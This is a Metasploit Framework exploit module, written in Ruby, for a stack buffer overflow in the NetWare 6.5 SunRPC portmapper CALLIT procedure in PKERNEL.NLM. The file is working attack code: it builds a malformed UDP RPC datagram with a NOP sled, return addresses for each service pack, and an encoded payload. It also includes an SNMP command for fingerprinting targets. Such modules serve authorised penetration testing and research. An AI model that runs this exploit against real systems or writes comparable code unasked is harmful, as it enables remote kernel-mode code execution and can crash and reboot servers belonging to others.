GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/netware/sunrpc/pkernel_callit.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# NetWare 6.5 SunRPC portmapper CALLIT stack buffer overflow
# (BID 36564, OSVDB 58447, ZDI 09-067; no CVE was assigned).
#
# The module sends a single UDP datagram to the portmapper (RPORT defaults
# to 111) whose CALLIT argument overruns a stack buffer in PKERNEL.NLM.
# Control is regained through a "push esp / ret" gadget in libc.nlm, so each
# target entry below is bound to one exact NetWare 6.5 service pack.
# PKERNEL.NLM runs in kernel mode, which is why 'Privileged' is true and why a
# failed attempt can reboot the server (see the description string).
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Udp

  # Registers module metadata (name, description, references, payload size
  # limit, platform and the per-service-pack return addresses) and the RPORT
  # option.
  #
  # @param info [Hash] info overrides merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'NetWare 6.5 SunRPC Portmapper CALLIT Stack Buffer Overflow',
      'Description' => %q{
        This module exploits a stack buffer overflow in the NetWare PKERNEL.NLM driver's CALLIT procedure.
        PKERNEL.NLM is installed by default on all NetWare servers to support NFS.
        The PKERNEL.NLM module runs in kernel mode so a failed exploit attempt can
        cause the operating system to reboot.
      },
      'Author' => [ 'pahtzo', ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          # There is no CVE for this vulnerability
          [ 'BID', '36564' ],
          [ 'OSVDB', '58447' ],
          [ 'ZDI', '09-067' ],
        ],
      # PKERNEL.NLM executes in kernel mode, so the payload does too.
      'Privileged' => true,
      'Payload' =>
        {
          # Upper bound on the encoded payload appended after the return address.
          'Space' => 2020,
        },
      'Platform' => 'netware',
      'Targets' =>
        [
          # Each 'Ret' is the address of a "push esp / ret" gadget in libc.nlm
          # for that service pack; picking the wrong SP means a wrong address
          # and, given the kernel-mode context, most likely a reboot.
          #
          # NetWare SP and PKERNEL.NLM version can be found in SNMP:
          # snmpwalk -Os -c public -v 1 [target hostname] | egrep -i "sysdescr|pkernel.nlm"
          # sysDescr.0 = STRING: Novell NetWare 5.70.08 October 3, 2008
          # hrSWRunName.1191394992 = STRING: "PKERNEL.NLM v15.01 (20081014)"
          [ 'NetWare 6.5 SP2', { 'Ret' => 0xb2329b98 } ], # push esp - ret (libc.nlm)
          [ 'NetWare 6.5 SP3', { 'Ret' => 0xb234a268 } ], # push esp - ret (libc.nlm)
          [ 'NetWare 6.5 SP4', { 'Ret' => 0xbabc286c } ], # push esp - ret (libc.nlm)
          [ 'NetWare 6.5 SP5', { 'Ret' => 0xbabc9c3c } ], # push esp - ret (libc.nlm)
          [ 'NetWare 6.5 SP6', { 'Ret' => 0x823c835c } ], # push esp - ret (libc.nlm)
          [ 'NetWare 6.5 SP7', { 'Ret' => 0x823c83fc } ], # push esp - ret (libc.nlm)
          [ 'NetWare 6.5 SP8', { 'Ret' => 0x823C870C } ], # push esp - ret (libc.nlm)
        ],

      'DisclosureDate' => '2009-09-30'))

    # Portmapper listens on 111 by default; only the port is configurable here.
    register_options([Opt::RPORT(111)])
  end

  # Builds the malformed RPC call and sends it as one UDP datagram.
  #
  # Wire layout (every header field is a big-endian 32-bit word, pack 'N'):
  #   1. ONC RPC v2 CALL header for program 100000 (portmap) version 2,
  #      procedure 5 (CALLIT), with AUTH_NULL credentials and verifier.
  #   2. CALLIT body naming program 0 / version 1 / procedure 1 and declaring
  #      an argument length of 4097.
  #   3. The argument itself: 2072 bytes of NOPs up to the return-address
  #      slot, the target's 4-byte little-endian ('V') gadget address, then
  #      the encoded payload (bounded by 'Space' => 2020).
  #
  # Nothing is read back from the socket: the only success signal is the
  # payload handler connecting, and a miss can reboot the host (kernel mode).
  #
  # Detection note: a portmap CALLIT (proc 5) request over UDP carrying a
  # multi-kilobyte argument is atypical for legitimate clients, and is
  # presumably what a network signature for this issue keys on.
  def exploit
    connect_udp

    buf = [rand(0xffffffff)].pack('N') # XID (random; the reply is never read, so the value is irrelevant)
    buf << [0].pack('N') # Message Type: Call (0)
    buf << [2].pack('N') # RPC Version: 2
    buf << [100000].pack('N') # Program: Portmap (100000)
    buf << [2].pack('N') # Program Version: 2
    buf << [5].pack('N') # Procedure: CALLIT (5)
    buf << [0].pack('N') # Credentials AUTH_NULL (0)
    buf << [0].pack('N') # Length: 0
    buf << [0].pack('N') # Verifier AUTH_NULL (0)
    buf << [0].pack('N') # Length: 0
    buf << [0].pack('N') # Program: Unknown (0)
    buf << [1].pack('N') # Version: 1
    buf << [1].pack('N') # Procedure: proc-1 (1)
    buf << [4097].pack('N') # Arguments: <DATA> length: 4097

    buf << make_nops(2072) # fill to ret: NOP sled from the start of the argument body to the return-address slot
    buf << [target.ret].pack('V') # addr. of push esp - ret (little-endian, x86), selected per service pack
    buf << payload.encoded # payload follows the gadget address; its size is capped by 'Space' => 2020

    # print_status("payload space #{payload_space()}...")
    # print_status("payload len #{payload.encoded.length}...")
    # print_status("total buf len #{buf.length}...")

    print_status("Trying target #{target.name}...")

    udp_sock.put(buf)
    handler
    disconnect_udp
  end
end